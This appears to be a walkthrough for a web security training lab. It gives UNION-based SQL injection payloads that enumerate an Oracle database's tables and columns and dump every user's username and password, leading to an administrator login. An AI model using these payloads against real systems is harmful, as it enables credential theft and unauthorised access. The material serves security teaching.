Use Burp Suite to intercept and modify the request that sets the product category filter.
Determine the number of columns that are being returned by the queryarrow-up-right and which columns contain text dataarrow-up-right. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter:
category
'+UNION+SELECT+'abc','def'+FROM+dual--
Use the following payload to retrieve the list of tables in the database:
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
Find the name of the table containing user credentials.
Use the following payload (replacing the table name) to retrieve the details of the columns in the table:
'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'--
Find the names of the columns containing usernames and passwords.
Use the following payload (replacing the table and column names) to retrieve the usernames and passwords for all users:
'+UNION+SELECT+USERNAME_ABCDEF,+PASSWORD_ABCDEF+FROM+USERS_ABCDEF--
Find the password for the administrator user, and use it to log in.
administrator
Last updated 2 years ago